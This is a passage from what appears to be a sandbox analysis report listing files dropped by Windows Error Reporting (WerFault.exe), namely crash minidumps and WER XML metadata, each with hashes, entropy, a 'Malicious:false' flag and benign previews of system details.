.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4579
                  Entropy (8bit):4.466795764155806
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYj1Ym8M4JAtutFa++q84wuEvmZltId:uIjfdI7j8Zi7VxJwf+GjvmZltId
                  MD5:357D5F8E46EBAC84B48E173FC17DA767
                  SHA1:FE4138E89DF0129242AC4524ACA1094DDE1CE9CE
                  SHA-256:7E18850E126D2F0A21E9E44B8A2D26BA50CDF8BECFF1A402212C60EA842BD9C4
                  SHA-512:C4F793515D667801EFB54783FCF7C55477EE7CE0DDB6C86CA9E370572F302105276E441EF46C37AB46CC2E16E7F37376639AFFCE53705E5CC92EF06546799B2B
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 08:32:44 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):27340
                  Entropy (8bit):2.738059666788078
                  Encrypted:false
                  SSDEEP:192:h1TT3hr+XfnUJ57OfHT5KRaM1iMwHyVJRW4L1WZULvnLPv:bfhunUGfHT5KRaAbwIzW4AZUHv
                  MD5:F089D495F718DEEE5D9634470CCDB478
                  SHA1:7CD77263DBDAAE3C6EA411918B8D3ABDB8C42DD8
                  SHA-256:5B69AE558CC397F56AE9FE204F3D2771D0B3683E4958794E6D30DC11BEAAE09C
                  SHA-512:9187FECD47DA5A5B6B8152D53175260E19F3DF7AAD6607662927A1A77D64C8B04A35F575B6B3A5B000A2D3655BF49D068A221997A4C89EED87B1B0C019898193
                  Malicious:false
                  Preview:MDMP..a..... ..........f............4...............<...........<...........T.......8...........T...............$X..........8...........$...............................................................................eJ..............GenuineIntel............T.......x......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8268
                  Entropy (8bit):3.6953956326395576
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJK06c6YH26ltgmf1XpDB89bBlsfBFLm:R6lXJp6c6YW6fgmf18B+fBE
                  MD5:67870B0308CE5DA2EAB7ECACA17BC661
                  SHA1:1A9FC2F2BB5F1F9A5C2F269D87366C520DFCCB17
                  SHA-256:26A909DBB3B7063EE45FBA96BC40DDA6DC35134B92E14009667E91C6EB0BC6A7
                  SHA-512:A1B4A9BF7083EA9F32A577122C43099D685AFA23C5B22FCDC107172BE0A12462FB7D1141175D506BE2FBE7B7BC201BD52504A9C23585CF643F8A577809112AE3
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.0.8.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4551
                  Entropy (8bit):4.436852234504776
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjzYm8M4JgWutF0mo+q8iwugCvBlUHd:uIjfdI7j8Zi7VHJXLmo07CvBlUHd
                  MD5:7E295E8DFC635007DEAA5F7413665841
                  SHA1:697E77A206E6F7210234A1718FE8BE63C479FC91
                  SHA-256:8845FD563384554625D28F9093982F0F0BACBD3F3F526D93FE8AD3177F55535F
                  SHA-512:C5A91B20EDD9EB46F7E0CEF9CD413CAD7B0967109F855422FF7E8E82FBAD9E3CB2A431A0E06528801FB93B93009D004F8D2404DBD056B826A5353C4934F1C81B
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:33 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):54840
                  Entropy (8bit):2.2800221848179505
                  Encrypted:false
                  SSDEEP:192:FSL7NDXmkVuCCmMOHPP1V3BGU6vQsuxLGvJGoJ38gblrgtyVXNYrq/DJH5FNB:AwkVuQDHF8QSJGoJ3trgSdYkDJfN
                  MD5:E2BBF77007E49AF63B4B487C845FF9FD
                  SHA1:90E733A628D63920F1699B8023BFB3FB763EFE00
                  SHA-256:A43E6D8BB551E3B0ADD7CA7650D87805C1AE0676AAC0A6C9769783FCF579804B
                  SHA-512:72461852A27F294D8EBE58557E8E7FA661F358BDD64DD907910782979350C0580AC9C37B974F15336604DD43D8C5A54D782695298A35B19184AAE54E53467488
                  Malicious:false
                  Preview:MDMP..a..... ..........f....................................<................+..........`.......8...........T...............@.......................................................................................................eJ......`.......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 08:32:35 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):66880
                  Entropy (8bit):2.3280137866101396
                  Encrypted:false
                  SSDEEP:192:b2u+u8GX2sEEVI1OHPhQwx+CErEG4ou+5oNLGvQ8CJ38gblrgtyVXaHApY2JWaSi:LUsEE3HppUu+5BQ8CJ3trgSKHoJAbU7
                  MD5:159943F4A4354FF4F9E6A566440DB406
                  SHA1:C1984D3032C292390FCC4E7493226D613A749074
                  SHA-256:048C839207E0EDA1183F0C17D045D75329C47D1FDA6D7A6D3DD436FBA8F1E5E8
                  SHA-512:07D6F7B1F08AD9D0E3D4EC32C8A7BB11DBFB9B6C68B9C575EBD29CA7A82DE87125AE01C36FDB5FB9E54D0A3499003EB3602670354165F5490ACB80FDA50765A0
                  Malicious:false
                  Preview:MDMP..a..... ..........f....................................<............... 0..........`.......8...........T...............h...........P...........<...............................................................................eJ..............GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8408
                  Entropy (8bit):3.70255981821725
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJno6K6Y2DzSUc3Vl/ggmfGUpBO89b/QsfCVm:R6lXJo6K6YeSUKVKgmfGk/jfJ
                  MD5:B2541FEB24C04D82303B2AD673479421
                  SHA1:9F2364C3FB67E19C5DD4923BAE5E5287E4A68E39
                  SHA-256:8CAC7C7E14AAAEB59FB8DB13C4846BFA203D7FC665C740CF60236E4CDEEF7863
                  SHA-512:4A6633AE5A5F63F105A84E4BC00F8FB1AA6FA184825654F8344B87DEAAAE13594AEACEA8C93C160176603E48AEA74BB85D9225F0E7A789526CEE61F3C62A4A9E
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):4.488810256374811
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjHYm8M4JAtFWb+q8vdEvmZltId:uIjfdI7j8Zi7VTJPKyvmZltId
                  MD5:0AFAA89002608C1CB1A761AF5CB4416F
                  SHA1:A639C8C0C0BB1DD53BD02E26E155F663A5A6B651
                  SHA-256:7B96000B4AA78A8309417064AC642AC4E9A5EB499B142E654FAC50906CB9ADE3
                  SHA-512:B4778E4583763F58B3EC7AFEC99A2E7186CF8276FFBAF3D7C98A0C2003EFE1AF3604E3F9C498BBAD37D4873786C1A38510343DDEEF0A7054B092A96E4C1CC261
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 08:33:00 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):49248
                  Entropy (8bit):2.1815790332797453
                  Encrypted:false
                  SSDEEP:192:xprRdGXj0SJOOj8jX2rY/q2cGAZz8G7deuwOe+4+T0BDeJJhP/+r87:3VQ0SPjknAp8sdAOHT6DC++
                  MD5:B38E3378ACCD5C472482B65179F6286C
                  SHA1:E94AD367C09898C9DF6F068EF9B06FE000C2ACA4
                  SHA-256:BF5C1A41FA0A184C07877C0D1E2E779BE236E5C565B91CB6C31A832E3552E1EF
                  SHA-512:B0C9C7436DE0FF623A9E30CAE6B837F8BCE19C69045183B4F3BFA8A881BC6C54A2EF394436C9079756798D8DD847AE9283284E5F91C6762A7EB78039B7F7606E
                  Malicious:false
                  Preview:MDMP..a..... ..........f....................................T...4&..........T.......8...........T...........(...8.......................................................................................................eJ......L.......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6366
                  Entropy (8bit):3.7233857888597877
                  Encrypted:false
                  SSDEEP:96:RSIU6o7wVetbzlV63EyYznpFX+ay5aMOUP89bwusfItOwm:R6l7wVeJxV60yYNUpBP89bwusfoOwm
                  MD5:6ECD0C0FEFCCB50DBA2510C74A8AADF1
                  SHA1:288B42D744CFB901C0AA20C4CF2535EEEFFF4D46
                  SHA-256:AF9C24F69BBDF6CDDD2357B0E7BF4A74445746DF986872F3063B27375B63C248
                  SHA-512:8C25E202F843EF749C6C8EE9A8AEE1A78C00115B14760942DDABDBCB392D2731ABB7C46C397C79A4EB9AE86F5F59A8DFBFDBBF7C84B55DE2F005FE8B3BBAA51E
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.8.8.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4700
                  Entropy (8bit):4.467009781468776
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjpzYm8M4JgtFz+q8vKOCvBlU1d:uIjfdI7j8Zi7VcmJeKFCvBlU1d
                  MD5:873253C49CC4BB87654F31ADE7C619F5
                  SHA1:F19C14A51739FCF4F783FEDD0160EA0F8F50CB93
                  SHA-256:F92BDC7B2FDB38A404E35500048CA35573297488B80730FD29CE09944C351B68
                  SHA-512:C4EC39CD76516B57ED0C164236437B4B1440E9FE642473966A6D0F9FC4F65D57CD2B60471ACC2CDA69C103FFD2A0F28D30B6327A084332E097F2FFC859813325
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 08:33:02 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):74196
                  Entropy (8bit):2.297344520322796
                  Encrypted:false
                  SSDEEP:384:lYdEWaSgjQF6v8exMOYPu/qcGTJXx688GMhJMN+A5:KdDHgjLUeuOY2ScGTJS45
                  MD5:015F5F902420B6DB5DA256C0408CC2A9
                  SHA1:694D97141052C13EDA4E75F7E4A8924DE322F890
                  SHA-256:43870DE7CA956921DF6960817B05483BFEFE6FD3AE81256EA79A9B441397FEFD
                  SHA-512:20B8B6810588BA97E10BD41A57CC5E183C8C575B569445ADF94784535F1BE2B29D9FA6A09145636FD0BA9D6CF5C5A8C48A3A8518013D21BFA9F3F3D6C02A1F2A
                  Malicious:false
                  Preview:MDMP..a..... ..........f............$...........\...,............0..........T.......8...........T........... ...........................t...............................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6386
                  Entropy (8bit):3.721425266053012
                  Encrypted:false
                  SSDEEP:96:RSIU6o7wVetbzlC6DUYznpFX+ay5aMOUj89brusfxzIvZm:R6l7wVeJxC6YYNUpBj89brusfxaZm
                  MD5:09C0A35CC45B6EB87DDC91EE5E2D5860
                  SHA1:97570007939E9FF3628003A2B4141C4E4E56CF7B
                  SHA-256:A611537067335683F00E594B4B95FE6C2889A9ECD72717DC07C8CB13E8E2F9D8
                  SHA-512:4C5A4630158BB07CC0A24D35D8E9F47D066C1B40C6D85101C543E273A408BCDF67D9A7A9326594E9D390DB33E2BC03CF1874B425311592C660AED1EC835DCD20
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.8.8.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4700
                  Entropy (8bit):4.46722618752413
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsDJg77aI9V8ZTWpW8VYjmYm8M4JgtFI1+q8vKOCvBlU1d:uIjfdI7j8Zi7VqJrKFCvBlU1d
                  MD5:A00DBF099259E6E1EA32656519891D39
                  SHA1:95A16495E6EE818D9BFAEAFC6B54EF12ECEB7AE6
                  SHA-256:014C9CA17E14494B8DD1D4B6DF5053009B3053DEF5B3242A19DAA1BDF26D2AC5
                  SHA-512:CED40AE5E09BD0A51445D5BF2A1E85A39C9AA0BA9E7DD60B7A4E952F2114FBE515A1C41479F205A98C6D192CB715335F3DCE3F94F84237CAF5F308F547CE5F7D
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515495" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 08:33:03 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):74088
                  Entropy (8bit):2.316765339690643
                  Encrypted:false
                  SSDEEP:384:ufFEWa7y1jA7W6QMOYPu/qcGrXW688G8UcxhLJMAOqG4:8DnjA7OY2ScGrxnJG4
                  MD5:71B71530DB6F73B7BE0D0525163C396B
                  SHA1:B0B2A583B43CC43BD7261D5E3BE418D75498F046
                  SHA-256:A4D4AE57285A87D6CA408D5DDEE9D1287121CA77D25EF4E33F2CBADFC52B7436
                  SHA-512:E633CA1D7F9B32698A5D0E514C4EDA562C0B837DA8A2E9674F545C7630CD3BD0D5EF6CA01371C50366BB28A5C170DCC1660EFD820E941B9EFEC8DC8412B187BD
                  Malicious:false
                  Preview:MDMP..a..... ..........f............$...........\...,............0..........T.......8...........T.......................................t...............................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6386
                  Entropy (8bit):3.721526869629576
                  Encrypted:false
                  SSDEEP:96:RSIU6o7wVetbzlf6D3eeYznpFX+ay5aMOUo89brusfwlZm:R6l7wVeJxf67YNUpBo89brusfwlZm
                  MD5:C503A623E8E48BBE6193F962C0B23458
                  SHA1:A455838DAB22725ACA5B084BADBA5C9FBA51C9C9
                  SHA-256:AF4E718F580E77BF2A80F1B18E54C6D15A74C15EE18CB9C04B15727366032261
                  SHA-512:0C94EB9B13E16FC8A68E40011EE19D631A732B0C5156C8B2EA07998C8F3E233181F448E00E76704FCC98CE444E798CF64D8879604056B55B230C2121B330891F
                  Malicious:false
